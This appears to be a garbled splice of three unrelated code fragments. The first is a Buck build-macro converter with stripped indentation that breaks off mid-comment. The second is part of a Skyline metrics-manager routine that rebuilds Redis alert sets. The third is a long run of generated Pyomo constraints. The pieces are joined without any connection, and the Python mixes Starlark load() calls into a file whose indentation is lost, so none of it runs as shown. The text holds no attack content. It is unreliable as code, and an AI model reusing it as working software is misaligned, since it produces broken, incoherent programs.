load("@fbcode_macros//build_defs:python_typing.bzl", "gen_typing_config_attrs")
load("@fbcode_macros//build_defs:core_tools.bzl", "core_tools")
load("@fbcode_macros//build_defs:platform_utils.bzl", "platform_utils")
load("@fbcode_macros//build_defs/config:read_configs.bzl", "read_flags")
load("@fbcode_macros//build_defs:sanitizers.bzl", "sanitizers")
load("@fbcode_macros//build_defs:target_utils.bzl", "target_utils")
load("@fbcode_macros//build_defs:third_party.bzl", "third_party")
load("@fbcode_macros//build_defs:src_and_dep_helpers.bzl", "src_and_dep_helpers")
load("@fbcode_macros//build_defs/facebook:python_wheel_overrides.bzl", "python_wheel_overrides")
load("@bazel_skylib//lib:partial.bzl", "partial")
MACRO_PATTERN = (
re.compile('\\$\\((?P<name>[^)\\s]+)(?: (?P<args>[^)]*))?\\)'))
Context = collections.namedtuple(
'Context',
[
'buck_ops',
'build_mode',
'default_compiler',
'global_compiler',
'coverage',
'link_style',
'mode',
'lto_type',
'third_party_config',
'config',
],
)
BuckOperations = collections.namedtuple(
'BuckOperations',
[
'add_build_file_dep',
'glob',
'include_defs',
'read_config',
],
)
Tp2ProjectBuild = collections.namedtuple(
'Tp2ProjectBuild',
[
'project_deps',
'subdir',
'versions',
],
)
CXX_BUILD_INFO_TEMPLATE = """\
#include <stdint.h>
const char* const BuildInfo_kBuildMode = "{build_mode}";
const char* const BuildInfo_kBuildTool = "{build_tool}";
const char* const BuildInfo_kCompiler = "{compiler}";
const char* const BuildInfo_kHost = "{host}";
const char* const BuildInfo_kPackageName = "{package_name}";
const char* const BuildInfo_kPackageVersion = "{package_version}";
const char* const BuildInfo_kPackageRelease = "{package_release}";
const char* const BuildInfo_kPath = "{path}";
const char* const BuildInfo_kPlatform = "{platform}";
const char* const BuildInfo_kRevision = "{revision}";
const char* const BuildInfo_kRule = "{rule}";
const char* const BuildInfo_kRuleType = "{rule_type}";
const char* const BuildInfo_kTime = "{time}";
const char* const BuildInfo_kTimeISO8601 = "{time_iso8601}";
const char* const BuildInfo_kUpstreamRevision = "{upstream_revision}";
const char* const BuildInfo_kUser = "{user}";
const uint64_t BuildInfo_kRevisionCommitTimeUnix = {revision_epochtime};
const uint64_t BuildInfo_kTimeUnix = {epochtime};
const uint64_t BuildInfo_kUpstreamRevisionCommitTimeUnix =
{upstream_revision_epochtime};
"""
GENERATED_LIB_SUFFIX = '__generated-lib__'
def is_collection(obj):
    """
    Return whether `obj` is an array-like collection (list, set or tuple).

    Strings and dicts deliberately do not count as collections here.
    """
    # `isinstance` with a tuple of types replaces the original manual loop.
    return isinstance(obj, (list, set, tuple))
# Compiler/linker flag lists for the two supported LTO flavors (clang only).
_THIN_LTO_FLAG = ["-flto=thin"]
_LTO_FLAG = ["-flto"]
def _lto_linker_flags_partial(_, compiler):
    """Return the LTO linker flags for `compiler` (empty for non-clang)."""
    # Only clang supports our LTO modes; everything else gets no extra flags.
    if compiler != "clang":
        return []
    return _THIN_LTO_FLAG if config.get_lto_type() == "thin" else _LTO_FLAG
class Converter(object):
def __init__(self, context):
self._context = context
self._tp2_build_dat_cache = {}
def get_third_party_root(self, platform):
if self._context.config.get_third_party_use_platform_subdir():
return os.path.join(
self._context.config.get_third_party_buck_directory(),
platform)
else:
return self._context.config.get_third_party_buck_directory()
def get_third_party_build_root(self, platform):
if self._context.config.get_third_party_use_build_subdir():
return os.path.join(self.get_third_party_root(platform), 'build')
else:
return self.get_third_party_root(platform)
def get_third_party_tools_root(self, platform):
return os.path.join(self.get_third_party_root(platform), 'tools')
def get_platform_flags_from_arch_flags(self, arch_flags):
"""
Format a dict of architecture names to flags into a platform flag list
for Buck.
"""
def _get_platform_flags_from_arch_flags_partial(platform_flags, platform, _):
return platform_flags.get(platform)
platform_flags = {}
for arch, flags in sorted(arch_flags.items()):
platforms = platform_utils.get_platforms_for_architecture(arch)
for platform in platform_utils.get_platforms_for_architecture(arch):
platform_flags[platform] = flags
return src_and_dep_helpers.format_platform_param(
partial.make(
_get_platform_flags_from_arch_flags_partial, platform_flags))
def get_tool_version(self, platform, project):
conf = self._context.third_party_config['platforms'][platform]
return LooseVersion(conf['tools']['projects'][project])
def get_tool_target(self, target, platform):
"""
Return the target for the tool described by the given RuleTarget.
"""
return target_utils.to_label(
None,
third_party.get_tool_path(target.base_path, platform),
target.name)
def get_tp2_dep_path(self, project, platform):
"""
Return the path within third-party for the given project. This will be
the directory, not a specific target or binary. Based on configuration,
and the path may be modified to fit fbcode's layout
"""
if self._context.config.get_third_party_use_build_subdir():
return os.path.join(self.get_third_party_root(platform), 'build', project)
else:
return project
def without_platforms(self, formatted): # type: PlatformParam[Any, List[Tuple[str, Any]]] -> Any
"""
Drop platform-specific component of the fiven `PlatformParam`, erroring
out if it contained anything.
"""
param, platform_param = formatted
if platform_param:
raise ValueError(
'unexpected platform sources: {!r}'.format(platform_param))
return param
def merge_platform_deps(self, dst, src):
for platform, deps in src.iteritems():
dst.setdefault(platform, [])
dst[platform].extend(deps)
def is_test(self, buck_rule_type):
return buck_rule_type.endswith('_test')
def read_choice(self, section, field, choices, default=None):
"""
Read a string from `.buckconfig` which can be one of the values given
in `choices`.
"""
val = self._context.buck_ops.read_config(section, field)
if val is not None:
if val in choices:
return val
else:
raise TypeError(
'`{}:{}`: must be one of ({}), but was {!r}'
.format(section, field, ', '.join(choices), val))
elif default is not None:
return default
else:
raise KeyError(
'`{}:{}`: no value set'.format(section, field))
def read_bool(self, section, field, default=None, required=True):
"""
Read a `boolean` from `.buckconfig`.
"""
val = self._context.buck_ops.read_config(section, field)
if val is not None:
if val.lower() == 'true':
return True
elif val.lower() == 'false':
return False
else:
raise TypeError(
'`{}:{}`: cannot coerce {!r} to bool'
.format(section, field, val))
elif default is not None:
return default
elif required:
raise KeyError(
'`{}:{}`: no value set'.format(section, field))
def read_int(self, section, field, default=None):
"""
Read an `int` from `.buckconfig`.
"""
val = self._context.buck_ops.read_config(section, field)
if val is not None:
try:
return int(val)
except ValueError as e:
raise TypeError(
'`{}:{}`: cannot coerce {!r} to int: {}'
.format(section, field, val, e))
elif default is not None:
return default
else:
raise KeyError(
'`{}:{}`: no value set'.format(section, field))
def read_string(self, section, field, default=None):
"""
Read a `string` from `.buckconfig`.
"""
val = self._context.buck_ops.read_config(section, field)
if val is None:
val = default
return val
def read_list(self, section, field, default=None):
"""
Read a `list` from `.buckconfig`.
"""
val = self._context.buck_ops.read_config(section, field)
if val is None:
return default
return val.split()
def get_strip_mode(self, base_path, name):
"""
Return a flag to strip debug symbols from binaries, or `None` if
stripping is not enabled.
"""
# `dev` mode has lightweight binaries, so avoid stripping to keep rule
# keys stable.
if self._context.mode.startswith('dev'):
return 'none'
# If this is a core tool, we never strip to keep stable rule keys.
if core_tools.is_core_tool(base_path, name):
return 'none'
# Otherwise, read the config setting.
return self.read_choice(
'misc',
'strip_binaries',
['none', 'debug-non-line', 'full'],
default='none')
def get_strip_ldflag(self, mode):
"""
Return the linker flag to use for the given strip mode.
"""
if mode == 'full':
return '-Wl,-S'
elif mode == 'debug-non-line':
return '-Wl,--strip-debug-non-line'
elif mode == 'none':
return None
else:
raise Exception('invalid strip mode: ' + mode)
    def get_build_info_linker_flags(
            self,
            base_path,
            name,
            rule_type,
            platform,
            compiler):
        """
        Get the linker flags to configure how the linker embeds build info.

        Returns a list of `--build-info-*` flags; empty when the build-info
        mode for this rule is 'none'.  The flag order is preserved as the
        linker wrapper presumably consumes them positionally -- do not
        reorder.

        Raises:
            ValueError: 'full' build info is requested while
                `cxx.cache_links` is enabled (non-deterministic info would
                poison the cache).
        """
        ldflags = []
        # Per-rule build-info mode; semantics defined by the external
        # `build_info` module.
        mode = build_info.get_build_info_mode(base_path, name)
        # Make sure we're not using non-deterministic build info when caching
        # is enabled.
        if mode == 'full' and self.read_bool('cxx', 'cache_links', True):
            raise ValueError(
                'cannot use `full` build info when `cxx.cache_links` is set')
        # Add in explicit build info args.
        if mode != 'none':
            # Pass the build info mode to the linker.
            ldflags.append('--build-info=' + mode)
            explicit = (
                build_info.get_explicit_build_info(
                    base_path,
                    name,
                    rule_type,
                    platform,
                    compiler))
            ldflags.append('--build-info-build-mode=' + explicit.build_mode)
            # Package fields are optional; only emit the ones that are set.
            if explicit.package_name:
                ldflags.append(
                    '--build-info-package-name=' + explicit.package_name)
            if explicit.package_release:
                ldflags.append(
                    '--build-info-package-release=' + explicit.package_release)
            if explicit.package_version:
                ldflags.append(
                    '--build-info-package-version=' + explicit.package_version)
            ldflags.append('--build-info-compiler=' + explicit.compiler)
            ldflags.append('--build-info-platform=' + explicit.platform)
            ldflags.append('--build-info-rule=' + explicit.rule)
            ldflags.append('--build-info-rule-type=' + explicit.rule_type)
        return ldflags
def read_shlib_interfaces(self, buck_platform):
return self.read_choice(
'cxx#' + buck_platform,
'shlib_interfaces',
['disabled', 'enabled', 'defined_only'])
def get_binary_ldflags(self, base_path, name, rule_type, platform):
"""
Return ldflags set via various `.buckconfig` settings.
"""
ldflags = []
# If we're using TSAN, we need to build PIEs.
if sanitizers.get_sanitizer() == 'thread':
ldflags.append('-pie')
# Remove unused section to reduce the code bloat in sanitizer modes
if sanitizers.get_sanitizer() is not None:
ldflags.append('-Wl,--gc-sections')
# It's rare, but some libraries use variables defined in object files
# in the top-level binary. This works as, when linking the binary, the
# linker sees this undefined reference in the dependent shared library
# and so makes sure to export this symbol definition to the binary's
# dynamic symbol table. However, when using shared library interfaces
# in `defined_only` mode, undefined references are stripped from shared
# libraries, so the linker never knows to export these symbols to the
# binary's dynamic symbol table, and the binary fails to load at
# runtime, as the dynamic loader can't resolve that symbol.
#
# So, when linking a binary when using shared library interfaces in
# `defined_only` mode, pass `--export-dynamic` to the | |
%s items' % str(len(last_all_alerts_set)))
except:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to generate a list from the analyzer.last_all_alerts Redis key')
last_all_alerts_set = None
all_alerts_set = None
if all_alerts:
try:
all_alerts_list = [list(row) for row in all_alerts]
# A normal sorted nor set can be used as the list has dicts in it
all_alerts_set = sorted(all_alerts_list, key=lambda item: item[0])
logger.info('metrics_manager :: all_alerts_set from all_alerts has %s items' % str(len(all_alerts_set)))
except:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to create a sorted list from all_alerts object of type %s' % str(type(all_alerts_list)))
# Set the last known alert configuration to the current configuration
try:
self.redis_conn.set('analyzer.last_all_alerts', str(all_alerts_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to set analyzer.last_all_alerts Redis key')
# Compare the last known with the current, if there was a last known
# configuration, if different do a full refresh
if last_all_alerts_set:
if str(all_alerts_set) != str(last_all_alerts_set):
logger.info('metrics_manager :: alert settings have changed, sets will be refreshed')
refresh_redis_alert_sets = True
# Compare the current unique_metrics to the last smtp_alerter_metrics +
# non_smtp_alerter_metrics, if they have changed do a full refresh
if not refresh_redis_alert_sets:
smtp_alerter_metrics = []
non_smtp_alerter_metrics = []
try:
smtp_alerter_metrics = list(self.redis_conn_decoded.smembers('analyzer.smtp_alerter_metrics'))
except:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to get list from analyzer.smtp_alerter_metrics Redis key')
refresh_redis_alert_sets = True
smtp_alerter_metrics = None
try:
non_smtp_alerter_metrics = list(self.redis_conn_decoded.smembers('analyzer.non_smtp_alerter_metrics'))
except:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to get list from analyzer.non_smtp_alerter_metrics Redis key')
non_smtp_alerter_metrics = None
known_alerter_metrics_set = None
if smtp_alerter_metrics or non_smtp_alerter_metrics:
try:
known_alerter_metrics = smtp_alerter_metrics + non_smtp_alerter_metrics
known_alerter_metrics_set = set(known_alerter_metrics)
except:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to get list from analyzer.non_smtp_alerter_metrics Redis key')
# Compare known metrics to current unique_base_names if they are
# different do a full refresh
if known_alerter_metrics_set:
changed_metrics = []
try:
unique_base_names_set = set(list(unique_base_names))
if unique_base_names_set == known_alerter_metrics_set:
logger.info('metrics_manager :: unique_base_names_set and known_alerter_metrics_set are the same')
else:
set_difference = unique_base_names_set.difference(known_alerter_metrics_set)
for metric in set_difference:
changed_metrics.append(metric)
logger.info('metrics_manager :: there are %s metrics that have changed, sets will be refreshed' % str(len(changed_metrics)))
refresh_redis_alert_sets = True
del set_difference
except:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to determine hether the unique_base_names_set and known_alerter_metrics_set are different')
smtp_alerter_metrics = []
non_smtp_alerter_metrics = []
mirage_metrics = []
refresh_redis_alert_sets = True
# @added 20201104 - Feature #3788: snab_flux_load_test
# Feature #3560: External alert config
if refresh_redis_alert_sets:
logger.info('metrics_manager :: sets being refreshed, determining smtp_alerter_metrics')
all_smtp_alerter_metrics = []
all_mirage_metrics = []
mirage_metrics_expiration_times = []
mirage_metrics_keys = []
start_refresh = timer()
for base_name in unique_base_names:
if base_name not in all_smtp_alerter_metrics:
# Use the all_alerts list which includes external alert configs
# for alert in settings.ALERTS:
for alert in all_alerts:
pattern_match = False
if str(alert[1]) == 'smtp':
try:
pattern_match, metric_matched_by = matched_or_regexed_in_list(skyline_app, base_name, [alert[0]])
if LOCAL_DEBUG and pattern_match:
logger.debug('debug :: metrics_manager :: %s matched alert - %s' % (base_name, alert[0]))
try:
del metric_matched_by
except:
pass
if pattern_match:
all_smtp_alerter_metrics.append(base_name)
# @added 20160922 - Branch #922: Ionosphere
# Add a Redis set of mirage.unique_metrics
if settings.ENABLE_MIRAGE:
mirage_metric = False
try:
SECOND_ORDER_RESOLUTION_FULL_DURATION = int(alert[3])
if SECOND_ORDER_RESOLUTION_FULL_DURATION > 24:
mirage_metric = True
except:
mirage_metric = False
if mirage_metric:
metric_name = '%s%s' % (settings.FULL_NAMESPACE, base_name)
all_mirage_metrics.append(metric_name)
# @added 20200805 - Task #3662: Change mirage.last_check keys to timestamp value
# Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Add the mirage metric and its EXPIRATION_TIME to
# the mirage.metrics_expiration_times so that Mirage
# can determine the metric EXPIRATION_TIME without
# having to create and iterate the all_alerts
# object in the Mirage analysis phase so that the
# reported anomaly timestamp can be used to determine
# whether the EXPIRATION_TIME should be applied to a
# batch metric in the alerting and Ionosphere contexts
# mirage_alert_expiration_data = [base_name, int(alert[2])]
mirage_alert_expiration_data = [base_name, int(alert[2])]
mirage_metrics_expiration_times.append(mirage_alert_expiration_data)
# @added 20200904 - Task #3730: Validate Mirage running multiple processes
# Also always add the mirage.metrics Redis key for the
# metric which contains its hours_to_resolve so
# that the spin_process can add the mirage check
# files immediately, rather than waiting to add
# the mirage checks all in the alerting phase.
# This is done to reduce the time it takes to
# get through the analysis pipeline.
mirage_metrics_keys.append([base_name, int(alert[2]), SECOND_ORDER_RESOLUTION_FULL_DURATION])
break
except:
pattern_match = False
end_classify = timer()
logger.info('metrics_manager :: classifying metrics took %.6f seconds' % (end_classify - start_refresh))
logger.info('metrics_manager :: %s all_smtp_alerter_metrics were determined' % str(len(all_smtp_alerter_metrics)))
if all_smtp_alerter_metrics:
smtp_alerter_metrics = list(set(list(all_smtp_alerter_metrics)))
logger.info('metrics_manager :: %s unique smtp_alerter_metrics determined' % str(len(smtp_alerter_metrics)))
# Recreate the Redis set the analyzer.smtp_alerter_metrics
if smtp_alerter_metrics:
logger.info('metrics_manager :: recreating the analyzer.smtp_alerter_metrics Redis set')
try:
self.redis_conn.sadd('new_analyzer.smtp_alerter_metrics', *set(smtp_alerter_metrics))
except:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to add multiple members to the new_analyzer.smtp_alerter_metrics Redis set')
try:
self.redis_conn.delete('analyzer.smtp_alerter_metrics.old')
except:
pass
try:
self.redis_conn.rename('analyzer.smtp_alerter_metrics', 'analyzer.smtp_alerter_metrics.old')
except:
pass
try:
# @added 20180423 - Feature #2360: CORRELATE_ALERTS_ONLY
# Branch #2270: luminosity
# Add a Redis set of smtp_alerter_metrics for Luminosity to only
# cross correlate on metrics with an alert setting
self.redis_conn.rename('new_analyzer.smtp_alerter_metrics', 'analyzer.smtp_alerter_metrics')
except:
pass
try:
self.redis_conn.delete('analyzer.smtp_alerter_metrics.old')
except:
pass
logger.info('metrics_manager :: recreated the analyzer.smtp_alerter_metrics Redis set')
logger.info('metrics_manager :: determing non_smtp_alerter_metrics')
try:
unique_base_names_set = set(list(unique_base_names))
smtp_alerter_metrics_set = set(list(smtp_alerter_metrics))
if unique_base_names_set == smtp_alerter_metrics_set:
logger.info('metrics_manager :: unique_base_names_set and smtp_alerter_metrics_set are the same, no non_smtp_alerter_metrics')
else:
set_difference = unique_base_names_set.difference(smtp_alerter_metrics_set)
for metric in set_difference:
non_smtp_alerter_metrics.append(metric)
logger.info('metrics_manager :: there are %s non_alerter_metrics' % str(len(non_smtp_alerter_metrics)))
del set_difference
except:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to determine non_smtp_alerter_metrics from sets')
# Recreate the Redis set the analyzer.non_smtp_alerter_metrics
if non_smtp_alerter_metrics:
logger.info('metrics_manager :: recreating the analyzer.non_smtp_alerter_metrics Redis set')
try:
self.redis_conn.sadd('new_analyzer.non_smtp_alerter_metrics', *set(non_smtp_alerter_metrics))
except:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to add multiple members to the new_analyzer.non_smtp_alerter_metrics Redis set')
try:
self.redis_conn.delete('analyzer.non_smtp_alerter_metrics.old')
except:
pass
try:
self.redis_conn.rename('analyzer.non_smtp_alerter_metrics', 'analyzer.non_smtp_alerter_metrics.old')
except:
pass
try:
self.redis_conn.rename('new_analyzer.non_smtp_alerter_metrics', 'analyzer.non_smtp_alerter_metrics')
except:
pass
try:
self.redis_conn.delete('analyzer.non_smtp_alerter_metrics.old')
except:
pass
logger.info('metrics_manager :: recreated the analyzer.non_smtp_alerter_metrics Redis set')
try:
self.redis_conn.sunionstore('aet.analyzer.smtp_alerter_metrics', 'analyzer.smtp_alerter_metrics')
logger.info('metrics_manager :: copied Redis set analyzer.smtp_alerter_metrics to aet.analyzer.smtp_alerter_metrics via sunion')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to copy Redis set analyzer.smtp_alerter_metrics to aet.analyzer.smtp_alerter_metrics via sunion')
try:
self.redis_conn.sunionstore('aet.analyzer.non_smtp_alerter_metrics', 'analyzer.non_smtp_alerter_metrics')
logger.info('metrics_manager :: copied Redis set analyzer.non_smtp_alerter_metrics to aet.analyzer.non_smtp_alerter_metrics via sunion')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to copy Redis set analyzer.non_smtp_alerter_metrics to aet.analyzer.non_smtp_alerter_metrics via sunion')
logger.info('metrics_manager :: %s mirage metrics determined' % str(len(all_mirage_metrics)))
if all_mirage_metrics:
mirage_metrics = list(set(list(all_mirage_metrics)))
logger.info('metrics_manager :: %s unique mirage_metrics determined' % str(len(mirage_metrics)))
# Recreate the Redis set the mirage.unique_metrics
if mirage_metrics:
logger.info('metrics_manager :: recreating the mirage.unique_metrics Redis set')
try:
self.redis_conn.sadd('new_mirage.unique_metrics', *set(mirage_metrics))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add multiple members to the new_mirage.unique_metrics Redis set')
try:
self.redis_conn.delete('mirage.unique_metrics.old')
except:
pass
try:
self.redis_conn.rename('mirage.unique_metrics', 'mirage.unique_metrics.old')
except:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to rename Redis set mirage.unique_metrics to mirage.unique_metrics.old')
try:
self.redis_conn.rename('new_mirage.unique_metrics', 'mirage.unique_metrics')
except:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to rename Redis set new_mirage.unique_metrics to mirage.unique_metrics')
try:
self.redis_conn.delete('mirage.unique_metrics.old')
except:
pass
logger.info('metrics_manager :: recreated the mirage.unique_metrics Redis set')
end_refresh = timer()
logger.info('metrics_manager :: refresh of smtp_alerter_metrics, non_smtp_alerter_metrics and mirage_metrics took %.6f seconds' % (end_refresh - start_refresh))
if mirage_metrics_expiration_times:
logger.info('metrics_manager :: managing mirage.hash_key.metrics_expiration_times Redis hash key')
updated_keys = 0
added_keys = 0
removed_keys = 0
mirage_metrics_expiration_times_errors = 0
last_metrics_expiration_times = []
try:
raw_last_metrics_expiration_times = self.redis_conn_decoded.hgetall('mirage.hash_key.metrics_expiration_times')
for base_name_bytes in raw_last_metrics_expiration_times:
base_name = str(base_name_bytes)
expiration_time = int(raw_last_metrics_expiration_times[base_name])
last_metrics_expiration_times.append([base_name, expiration_time])
logger.info('metrics_manager :: %s entries in mirage.hash_key.metrics_expiration_times Redis hash key' % str(len(last_metrics_expiration_times)))
except:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to get Redis hash key mirage.hash_key.metrics_expiration_times')
last_metrics_expiration_times = []
# Add them all if there are none in the hash key
if not last_metrics_expiration_times:
logger.info('metrics_manager :: nothing found in Redis hash key, added all %s metrics from mirage_metrics_expiration_times' % (
str(len(mirage_metrics_expiration_times))))
error_logged = False
for item in mirage_metrics_expiration_times:
try:
self.redis_conn.hset(
'mirage.hash_key.metrics_expiration_times',
item[0], int(item[1]))
added_keys += 1
except:
mirage_metrics_expiration_times_errors += 1
if not error_logged:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to add entry in mirage.hash_key.metrics_expiration_times for - %s' % str(item))
error_logged = True
logger.info('metrics_manager :: added all %s metrics to mirage.hash_key.metrics_expiration_times Redis hash' % (
str(len(mirage_metrics_expiration_times))))
# Determine the base_names in the last_metrics_expiration_times
last_metrics_expiration_times_metrics = []
if last_metrics_expiration_times:
try:
last_metrics_expiration_times_metrics = [item[0] for item in last_metrics_expiration_times]
except:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to generate list of metric names from last_metrics_expiration_times')
| |
+ m.b103 - m.b202 <= 0)
# Machine-generated Pyomo model statements (do not hand-edit): triangle-style
# linearization constraints of the form -b_i + b_j - b_ij <= 0, enumerating
# each ordered pair (i, j) within a group of binary variables while the pair
# variable index (b202..., b130...) advances by one per constraint.
m.c3363 = Constraint(expr= - m.b96 + m.b104 - m.b203 <= 0)
m.c3364 = Constraint(expr= - m.b96 + m.b105 - m.b204 <= 0)
m.c3365 = Constraint(expr= - m.b96 + m.b106 - m.b205 <= 0)
m.c3366 = Constraint(expr= - m.b96 + m.b107 - m.b206 <= 0)
m.c3367 = Constraint(expr= - m.b96 + m.b108 - m.b207 <= 0)
m.c3368 = Constraint(expr= - m.b96 + m.b109 - m.b208 <= 0)
m.c3369 = Constraint(expr= - m.b96 + m.b110 - m.b209 <= 0)
m.c3370 = Constraint(expr= - m.b97 + m.b98 - m.b210 <= 0)
m.c3371 = Constraint(expr= - m.b97 + m.b99 - m.b211 <= 0)
m.c3372 = Constraint(expr= - m.b97 + m.b100 - m.b212 <= 0)
m.c3373 = Constraint(expr= - m.b97 + m.b101 - m.b213 <= 0)
m.c3374 = Constraint(expr= - m.b97 + m.b102 - m.b214 <= 0)
m.c3375 = Constraint(expr= - m.b97 + m.b103 - m.b215 <= 0)
m.c3376 = Constraint(expr= - m.b97 + m.b104 - m.b216 <= 0)
m.c3377 = Constraint(expr= - m.b97 + m.b105 - m.b217 <= 0)
m.c3378 = Constraint(expr= - m.b97 + m.b106 - m.b218 <= 0)
m.c3379 = Constraint(expr= - m.b97 + m.b107 - m.b219 <= 0)
m.c3380 = Constraint(expr= - m.b97 + m.b108 - m.b220 <= 0)
m.c3381 = Constraint(expr= - m.b97 + m.b109 - m.b221 <= 0)
m.c3382 = Constraint(expr= - m.b97 + m.b110 - m.b222 <= 0)
m.c3383 = Constraint(expr= - m.b98 + m.b99 - m.b223 <= 0)
m.c3384 = Constraint(expr= - m.b98 + m.b100 - m.b224 <= 0)
m.c3385 = Constraint(expr= - m.b98 + m.b101 - m.b225 <= 0)
m.c3386 = Constraint(expr= - m.b98 + m.b102 - m.b226 <= 0)
m.c3387 = Constraint(expr= - m.b98 + m.b103 - m.b227 <= 0)
m.c3388 = Constraint(expr= - m.b98 + m.b104 - m.b228 <= 0)
m.c3389 = Constraint(expr= - m.b98 + m.b105 - m.b229 <= 0)
m.c3390 = Constraint(expr= - m.b98 + m.b106 - m.b230 <= 0)
m.c3391 = Constraint(expr= - m.b98 + m.b107 - m.b231 <= 0)
m.c3392 = Constraint(expr= - m.b98 + m.b108 - m.b232 <= 0)
m.c3393 = Constraint(expr= - m.b98 + m.b109 - m.b233 <= 0)
m.c3394 = Constraint(expr= - m.b98 + m.b110 - m.b234 <= 0)
m.c3395 = Constraint(expr= - m.b99 + m.b100 - m.b235 <= 0)
m.c3396 = Constraint(expr= - m.b99 + m.b101 - m.b236 <= 0)
m.c3397 = Constraint(expr= - m.b99 + m.b102 - m.b237 <= 0)
m.c3398 = Constraint(expr= - m.b99 + m.b103 - m.b238 <= 0)
m.c3399 = Constraint(expr= - m.b99 + m.b104 - m.b239 <= 0)
m.c3400 = Constraint(expr= - m.b99 + m.b105 - m.b240 <= 0)
m.c3401 = Constraint(expr= - m.b99 + m.b106 - m.b241 <= 0)
m.c3402 = Constraint(expr= - m.b99 + m.b107 - m.b242 <= 0)
m.c3403 = Constraint(expr= - m.b99 + m.b108 - m.b243 <= 0)
m.c3404 = Constraint(expr= - m.b99 + m.b109 - m.b244 <= 0)
m.c3405 = Constraint(expr= - m.b99 + m.b110 - m.b245 <= 0)
m.c3406 = Constraint(expr= - m.b100 + m.b101 - m.b246 <= 0)
m.c3407 = Constraint(expr= - m.b100 + m.b102 - m.b247 <= 0)
m.c3408 = Constraint(expr= - m.b100 + m.b103 - m.b248 <= 0)
m.c3409 = Constraint(expr= - m.b100 + m.b104 - m.b249 <= 0)
m.c3410 = Constraint(expr= - m.b100 + m.b105 - m.b250 <= 0)
m.c3411 = Constraint(expr= - m.b100 + m.b106 - m.b251 <= 0)
m.c3412 = Constraint(expr= - m.b100 + m.b107 - m.b252 <= 0)
m.c3413 = Constraint(expr= - m.b100 + m.b108 - m.b253 <= 0)
m.c3414 = Constraint(expr= - m.b100 + m.b109 - m.b254 <= 0)
m.c3415 = Constraint(expr= - m.b100 + m.b110 - m.b255 <= 0)
m.c3416 = Constraint(expr= - m.b101 + m.b102 - m.b256 <= 0)
m.c3417 = Constraint(expr= - m.b101 + m.b103 - m.b257 <= 0)
m.c3418 = Constraint(expr= - m.b101 + m.b104 - m.b258 <= 0)
m.c3419 = Constraint(expr= - m.b101 + m.b105 - m.b259 <= 0)
m.c3420 = Constraint(expr= - m.b101 + m.b106 - m.b260 <= 0)
m.c3421 = Constraint(expr= - m.b101 + m.b107 - m.b261 <= 0)
m.c3422 = Constraint(expr= - m.b101 + m.b108 - m.b262 <= 0)
m.c3423 = Constraint(expr= - m.b101 + m.b109 - m.b263 <= 0)
m.c3424 = Constraint(expr= - m.b101 + m.b110 - m.b264 <= 0)
m.c3425 = Constraint(expr= - m.b102 + m.b103 - m.b265 <= 0)
m.c3426 = Constraint(expr= - m.b102 + m.b104 - m.b266 <= 0)
m.c3427 = Constraint(expr= - m.b102 + m.b105 - m.b267 <= 0)
m.c3428 = Constraint(expr= - m.b102 + m.b106 - m.b268 <= 0)
m.c3429 = Constraint(expr= - m.b102 + m.b107 - m.b269 <= 0)
m.c3430 = Constraint(expr= - m.b102 + m.b108 - m.b270 <= 0)
m.c3431 = Constraint(expr= - m.b102 + m.b109 - m.b271 <= 0)
m.c3432 = Constraint(expr= - m.b102 + m.b110 - m.b272 <= 0)
m.c3433 = Constraint(expr= - m.b103 + m.b104 - m.b273 <= 0)
m.c3434 = Constraint(expr= - m.b103 + m.b105 - m.b274 <= 0)
m.c3435 = Constraint(expr= - m.b103 + m.b106 - m.b275 <= 0)
m.c3436 = Constraint(expr= - m.b103 + m.b107 - m.b276 <= 0)
m.c3437 = Constraint(expr= - m.b103 + m.b108 - m.b277 <= 0)
m.c3438 = Constraint(expr= - m.b103 + m.b109 - m.b278 <= 0)
m.c3439 = Constraint(expr= - m.b103 + m.b110 - m.b279 <= 0)
m.c3440 = Constraint(expr= - m.b104 + m.b105 - m.b280 <= 0)
m.c3441 = Constraint(expr= - m.b104 + m.b106 - m.b281 <= 0)
m.c3442 = Constraint(expr= - m.b104 + m.b107 - m.b282 <= 0)
m.c3443 = Constraint(expr= - m.b104 + m.b108 - m.b283 <= 0)
m.c3444 = Constraint(expr= - m.b104 + m.b109 - m.b284 <= 0)
m.c3445 = Constraint(expr= - m.b104 + m.b110 - m.b285 <= 0)
m.c3446 = Constraint(expr= - m.b105 + m.b106 - m.b286 <= 0)
m.c3447 = Constraint(expr= - m.b105 + m.b107 - m.b287 <= 0)
m.c3448 = Constraint(expr= - m.b105 + m.b108 - m.b288 <= 0)
m.c3449 = Constraint(expr= - m.b105 + m.b109 - m.b289 <= 0)
m.c3450 = Constraint(expr= - m.b105 + m.b110 - m.b290 <= 0)
m.c3451 = Constraint(expr= - m.b106 + m.b107 - m.b291 <= 0)
m.c3452 = Constraint(expr= - m.b106 + m.b108 - m.b292 <= 0)
m.c3453 = Constraint(expr= - m.b106 + m.b109 - m.b293 <= 0)
m.c3454 = Constraint(expr= - m.b106 + m.b110 - m.b294 <= 0)
m.c3455 = Constraint(expr= - m.b107 + m.b108 - m.b295 <= 0)
m.c3456 = Constraint(expr= - m.b107 + m.b109 - m.b296 <= 0)
m.c3457 = Constraint(expr= - m.b107 + m.b110 - m.b297 <= 0)
m.c3458 = Constraint(expr= - m.b108 + m.b109 - m.b298 <= 0)
m.c3459 = Constraint(expr= - m.b108 + m.b110 - m.b299 <= 0)
m.c3460 = Constraint(expr= - m.b109 + m.b110 - m.b300 <= 0)
